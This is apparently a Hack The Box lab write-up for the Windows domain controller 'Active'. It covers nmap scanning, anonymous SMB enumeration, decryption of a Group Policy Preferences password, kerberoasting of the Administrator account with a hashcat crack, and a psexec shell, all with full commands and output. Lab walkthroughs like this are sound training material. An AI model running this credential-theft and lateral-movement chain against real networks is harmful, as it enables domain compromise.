Active - Hack The Box
Summary
Active is an easy Windows machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.
Box Details
- OS: Windows
- Difficulty: Easy
Scanning
- nmap service and version scan
$ sudo nmap -sC -sV -A -p- --min-rate 10000 10.129.37.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-30 12:11 CST
Warning: 10.129.37.20 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.37.20
Host is up (0.081s latency).
Not shown: 65489 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-30 18:12:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
531/tcp filtered conference
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1136/tcp filtered hhb-gateway
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
11059/tcp filtered unknown
13974/tcp filtered unknown
14465/tcp filtered unknown
21253/tcp filtered unknown
24557/tcp filtered unknown
26034/tcp filtered unknown
27573/tcp filtered unknown
28986/tcp filtered unknown
30742/tcp filtered unknown
34664/tcp filtered unknown
42373/tcp filtered unknown
42647/tcp filtered unknown
43748/tcp filtered unknown
45077/tcp filtered unknown
45342/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49281/tcp filtered unknown
53616/tcp filtered unknown
54677/tcp filtered unknown
57780/tcp filtered unknown
60915/tcp filtered unknown
65278/tcp filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/30%OT=53%CT=1%CU=33647%PV=Y%DS=2%DC=T%G=Y%TM=679B
OS:C140%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=I%CI=I%TS=7)SEQ(S
OS:P=102%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53CNW8ST11%O2=M53CN
OS:W8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=
OS:2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=
OS:M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)
OS:T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-30T18:13:12
|_ start_date: 2025-01-30T18:02:24
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 74.59 ms 10.10.14.1
2 84.46 ms 10.129.37.20
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.07 seconds
Enumeration
445 SMB
We could list available shares with a null session. And we can access the Replication
share
smbmap -u '' -p '' -H 10.129.37.20
[+] IP: 10.129.37.20:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Using smbmap
to spider the available share, I found a Group.xml
file which I downloaded to my local machine
$ smbmap -u '' -p '' -H 10.129.37.20 -s Replication -R --depth 10
[+] IP: 10.129.37.20:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 05:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 05:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 05:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 SecEdit
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 1098 Sat Jul 21 05:38:11 2018 GptTmpl.inf
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Groups
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 05:38:11 2018 Groups.xml
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 05:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 SecEdit
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\*
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 05:37:44 2018 ..
fr--r--r-- 3722 Sat Jul 21 05:38:11 2018 GptTmpl.inf
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Downloading the file using smbmap
smbmap -u '' -p '' -H 10.129.37.20 -s Replication --download '.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml'
[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/ricobandy/10.129.37.20-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
This is a GPO file created on the system and this sometimes contains an account and it’s encrypted password
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Getting User flag
We can decrypt this password by using the gpp-decrypt
tool
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
And now able to get the user flag connecting through SMB
$ smbclient -U SVC_TGS \\\\10.129.37.20\\Users
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 10:14:42 2018
.. D 0 Sat Jul 21 10:14:42 2018
user.txt AR 34 Thu Jan 30 12:03:27 2025
5217023 blocks of size 4096. 279461 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit
$ cat user.txt
5f20adb4816e7bfee74327568da70563
Privilege Escalation
To escalate our privileges on the box, I retrieved all users on the system
GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.129.37.20
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Querying 10.129.37.20 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2018-07-18 14:06:40.351723 2025-01-30 12:03:29.362551
Guest <never> <never>
krbtgt 2018-07-18 13:50:36.972031 <never>
SVC_TGS 2018-07-18 15:14:38.402764 2018-07-21 09:01:30.320277
With this box being a domain controller, I checked if I could find any user being kerberoastable and found that the Administrator
user is vulnerable to kerberoasting as it is configured with SPN, hence we can request a TGS and extract the hash for offline cracking
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.129.37.20
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 14:06:40.351723 2025-01-30 12:03:29.362551
Requesting for TGS
$ GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.129.37.20 -request
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 14:06:40.351723 2025-01-30 12:03:29.362551
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$91ea414aec2c3ef5dc58f0ff6152e808$0a2d93ecc729d452ae3b496dfff6f9828bfdd76b91d16c86201b6fd973089ee56333345335fd9bbfb56aa00c178d43a41dad73e5ccdb41caee06ade6f583619aa8bf9bc2dcc546658141b7bdf321a3301b13876de1958a39bcf2517dc839bde545d5f70e1bd31eaada209f2f2920385a6208364571ad3d209c6bcd9bff1e932febc723a5e448e6417ab4e3e220cdff62565cb8091d77f5f1639beab13c90d01396c57e84ee73067477452df8e6f0c4692c4eadf64acef9eae141a5b8b7b14ea715e2b31f306ed80e9c6fe665b056216ecd0d71e17f6abfd516ff8580c1dcbaae98786e5ba5c197253c5f72f2ba76b5422c86f09cab115309dbb10983bcdfbbdcee965649e7387a6477d8fd195ac9983e9e417d08e3dfc647192b9692b30dd22711976112e5433d184fb6543a7e77139a4e814fa9bc6673b046375fc85c3d9f9ecfa090baf7e7f0aab06841694873bf1c48bae19ea22927aac966691104b40b2364d56373f26ede55604bbca487ffbd2a54f5e65add269b548ec6adfa09a148774a856f1f7fe4b810d464a0f3a54fa37202ed81fd06ab66034d4c08d5a96999c7d10d8c0e0b91a6eae0c34b38ed43c97c8cb8d20f562d45449ff4a7090e7d764c6673026737015f32f2d717f2376670f17b3e664f97db7f04014a9bd4470a7d016cc7e7eedff3db51b599a80bfe4970228570153e1c4a400220de7d5df4a758b088869f7d9234e31ab0c449fa71f0fe2c928f72897d5403b88f59615e4fac4965409992b8879ded7b7f89eaf6c81257e04e5027ac5dc662cadce2a15b83e3d164f103b20c2c80679317cd291342d79f8baaa6233be58e8ff5746786b11e18ecd2b4da76012b2a319f1edbf78c201b3ede840b3430a07a8aa8997c41a9f27e0c72273992d2ef0d2b3d04b30ed5f4fa8039759e4a387b1621f2c6c6b01f76e2901fe228ed56e6872dc79cb95d1a3bb2eb8b8613f1e76eda8e123ba43247bedf86853ce1cf1dd7c598f9d5f742f8fc3938d3f816a620a02b52e720808948d1cb286efff0bc3928222d5430ff067d916af8ebe9574281f559a0f15a2f47f8f18378d0078016b1ba8ebdd4e4a6d0d5e0d890e01cb6b7b915d97b524168916f48c9633205898f524401fef3e7ba201e1ca54112f71fdd6e83683841cf35b22f9820d4b4b9b0ef1100759b59c2e92af019a7b38d985588d2279d2ec56fbb67bc26e5c5b2534f3c2763eff596fff9a51273b60d0a0390cab01a7d64746cc1
Using hashcat, I’m able to crack the hash and reveal the password:
- hashcat -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
- Administrator:Ticketmaster1968
$ hashcat -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$91ea414aec2c3ef5dc58f0ff6152e808$0a2d93ecc729d452ae3b496dfff6f9828bfdd76b91d16c86201b6fd973089ee56333345335fd9bbfb56aa00c178d43a41dad73e5ccdb41caee06ade6f583619aa8bf9bc2dcc546658141b7bdf321a3301b13876de1958a39bcf2517dc839bde545d5f70e1bd31eaada209f2f2920385a6208364571ad3d209c6bcd9bff1e932febc723a5e448e6417ab4e3e220cdff62565cb8091d77f5f1639beab13c90d01396c57e84ee73067477452df8e6f0c4692c4eadf64acef9eae141a5b8b7b14ea715e2b31f306ed80e9c6fe665b056216ecd0d71e17f6abfd516ff8580c1dcbaae98786e5ba5c197253c5f72f2ba76b5422c86f09cab115309dbb10983bcdfbbdcee965649e7387a6477d8fd195ac9983e9e417d08e3dfc647192b9692b30dd22711976112e5433d184fb6543a7e77139a4e814fa9bc6673b046375fc85c3d9f9ecfa090baf7e7f0aab06841694873bf1c48bae19ea22927aac966691104b40b2364d56373f26ede55604bbca487ffbd2a54f5e65add269b548ec6adfa09a148774a856f1f7fe4b810d464a0f3a54fa37202ed81fd06ab66034d4c08d5a96999c7d10d8c0e0b91a6eae0c34b38ed43c97c8cb8d20f562d45449ff4a7090e7d764c6673026737015f32f2d717f2376670f17b3e664f97db7f04014a9bd4470a7d016cc7e7eedff3db51b599a80bfe4970228570153e1c4a400220de7d5df4a758b088869f7d9234e31ab0c449fa71f0fe2c928f72897d5403b88f59615e4fac4965409992b8879ded7b7f89eaf6c81257e04e5027ac5dc662cadce2a15b83e3d164f103b20c2c80679317cd291342d79f8baaa6233be58e8ff5746786b11e18ecd2b4da76012b2a319f1edbf78c201b3ede840b3430a07a8aa8997c41a9f27e0c72273992d2ef0d2b3d04b30ed5f4fa8039759e4a387b1621f2c6c6b01f76e2901fe228ed56e6872dc79cb95d1a3bb2eb8b8613f1e76eda8e123ba43247bedf86853ce1cf1dd7c598f9d5f742f8fc3938d3f816a620a02b52e720808948d1cb286efff0bc3928222d5430ff067d916af8ebe9574281f559a0f15a2f47f8f18378d0078016b1ba8ebdd4e4a6d0d5e0d890e01cb6b7b915d97b524168916f48c9633205898f524401fef3e7ba201e1ca54112f71fdd6e83683841cf35b22f9820d4b4b9b0ef1100759b59c2e92af019a7b38d985588d2279d2ec56fbb67bc26e5c5b2534f3c2763eff596fff9a51273b60d0a0390cab01a7d64746cc1:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...746cc1
Time.Started.....: Sat Feb 15 12:06:49 2025 (5 secs)
Time.Estimated...: Sat Feb 15 12:06:54 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 1860.3 kH/s (0.84ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: Tiffany95 -> Thelittlemermaid
Started: Sat Feb 15 12:06:39 2025
Stopped: Sat Feb 15 12:06:56 2025
Using psexec.py
I was able to login as administrator to the box and retrieve the root flag
$ psexec.py administrator@10.129.37.20
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on 10.129.37.20.....
[*] Found writable share ADMIN$
[*] Uploading file oAUdEoJO.exe
[*] Opening SVCManager on 10.129.37.20.....
[*] Creating service tStq on 10.129.37.20.....
[*] Starting service tStq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd ..\..
C:\> cd Users\Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop>
C:\Users\Administrator\Desktop> type root.txt
a7666588875157821b74a54202ae7659
C:\Users\Administrator\Desktop>